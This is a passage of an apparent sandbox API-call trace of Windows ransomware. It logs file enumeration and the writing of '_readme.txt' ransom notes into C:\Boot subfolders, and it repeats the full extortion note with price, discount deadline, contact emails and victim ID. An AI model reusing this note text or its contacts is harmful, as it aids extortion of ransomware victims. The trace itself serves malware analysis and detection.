(HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79fd8 [0094.132] CreateFileW (lpFileName="C:\\Boot\\pt-PT\\_readme.txt" (normalized: "c:\\boot\\pt-pt\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5c8 [0094.133] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8b0) returned 0x33515f0 [0094.133] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x853) returned 0x333bc58 [0094.133] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-Oc0xgfzC7q\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0198nTsddywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x333bc58, cbMultiByte=2131, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-Oc0xgfzC7q\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0198nTsddywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 1108 [0094.133] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x32d0db8 [0094.133] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0094.133] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33515f0 | out: hHeap=0x630000) returned 1 [0094.133] lstrlenA (lpString="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-Oc0xgfzC7q\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0198nTsddywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT") returned 1107 [0094.133] WriteFile (in: hFile=0x5c8, lpBuffer=0x32d0db8*, nNumberOfBytesToWrite=0x453, lpNumberOfBytesWritten=0x9e2fb64, lpOverlapped=0x0 | out: lpBuffer=0x32d0db8*, lpNumberOfBytesWritten=0x9e2fb64*=0x453, lpOverlapped=0x0) returned 1 [0094.134] CloseHandle (hObject=0x5c8) returned 1 [0094.135] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0db8 | out: hHeap=0x630000) returned 1 [0094.135] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79fd8 | out: hHeap=0x630000) returned 1 [0094.135] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9ba4d90 | out: hHeap=0x630000) returned 1 [0094.135] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.135] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0094.135] FindFirstFileW (in: lpFileName="C:\\Boot\\pt-PT\\*", lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa1a48220, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa1a48220, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x670618 [0094.135] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0094.135] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa1a48220, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa1a48220, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0094.135] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe823ce95, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15e40, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0094.135] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa1a48220, ftCreationTime.dwHighDateTime=0x1d5d6b4, ftLastAccessTime.dwLowDateTime=0xa1a48220, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa1a48220, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x453, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0094.136] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa1a48220, ftCreationTime.dwHighDateTime=0x1d5d6b4, ftLastAccessTime.dwLowDateTime=0xa1a48220, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa1a48220, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x453, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0094.136] FindClose (in: hFindFile=0x670618 | out: hFindFile=0x670618) returned 1 [0094.136] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.136] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fd20 | out: hHeap=0x630000) returned 1 [0094.136] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fd20 [0094.136] PeekMessageW (in: lpMsg=0x9e2fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9e2fb74) returned 0 [0094.136] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0094.136] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0094.136] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.136] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0094.136] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0094.137] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0094.137] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.137] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0094.137] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0094.137] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0094.137] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.137] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0094.137] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0094.137] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0094.137] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.137] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0094.137] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0094.137] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0094.137] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.137] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0094.138] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0094.138] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b78ec8 [0094.138] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.138] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0094.138] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0094.138] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0094.138] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc2e) returned 0x32cf950 [0094.138] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.138] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cf950 | out: hHeap=0x630000) returned 1 [0094.138] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0094.138] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0094.138] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0094.138] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.138] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0094.138] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0094.138] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b78ec8 [0094.139] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.139] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0094.139] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0094.139] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0094.139] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0094.139] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0094.139] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0094.139] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0094.139] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0094.139] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0094.139] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0094.139] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0094.139] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.139] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0094.139] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0094.139] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0094.139] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.139] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0094.140] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0094.140] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b78ec8 [0094.140] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.140] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0094.140] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0094.140] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b78ec8 [0094.140] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.140] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0094.140] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0094.140] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0094.140] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.140] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0094.140] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0094.140] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0094.140] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.140] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0094.140] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0094.140] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0094.140] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.140] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0094.140] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0094.140] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0094.140] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.140] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0094.140] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0094.140] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0094.140] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.140] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0094.140] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0094.141] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0094.141] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.141] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0094.141] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0094.141] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0094.141] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.141] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0094.141] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0094.141] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0094.141] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x32cf950 [0094.141] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.141] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cf950 | out: hHeap=0x630000) returned 1 [0094.141] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0094.141] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0094.141] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0094.141] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.141] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0094.141] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0094.141] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0094.141] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc2e) returned 0x32cf950 [0094.141] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.141] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cf950 | out: hHeap=0x630000) returned 1 [0094.141] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0094.141] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0094.141] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0094.141] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0094.142] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0094.142] PathFindFileNameW (pszPath="C:\\Boot\\ru-RU\\") returned="ru-RU\\" [0094.142] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0094.142] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.142] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0094.142] PathFindFileNameW (pszPath="") returned="" [0094.142] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75670000 [0094.143] GetProcAddress (hModule=0x75670000, lpProcName="SHGetFolderPathW") returned 0x756f5708 [0094.143] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x32faf28 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0094.143] FreeLibrary (hLibModule=0x75670000) returned 1 [0094.143] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0094.143] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32faf28 | out: hHeap=0x630000) returned 1 [0094.143] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332ff28 | out: hHeap=0x630000) returned 1 [0094.143] PathAppendW (in: pszPath="C:\\Boot\\ru-RU\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\ru-RU\\_readme.txt") returned 1 [0094.143] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0094.143] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332ff28 | out: hHeap=0x630000) returned 1 [0094.143] PathFileExistsW (pszPath="C:\\Boot\\ru-RU\\_readme.txt") returned 0 [0094.144] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x7d00) returned 0x9ba4d90 [0094.144] lstrcpyW (in: lpString1=0x9ba4d90, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-Oc0xgfzC7q\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0198nTsdd" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-Oc0xgfzC7q\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0198nTsdd") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-Oc0xgfzC7q\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0198nTsdd" [0094.144] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-Oc0xgfzC7q\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0198nTsdd", lpString2="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-Oc0xgfzC7q\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0198nTsddywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-Oc0xgfzC7q\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get 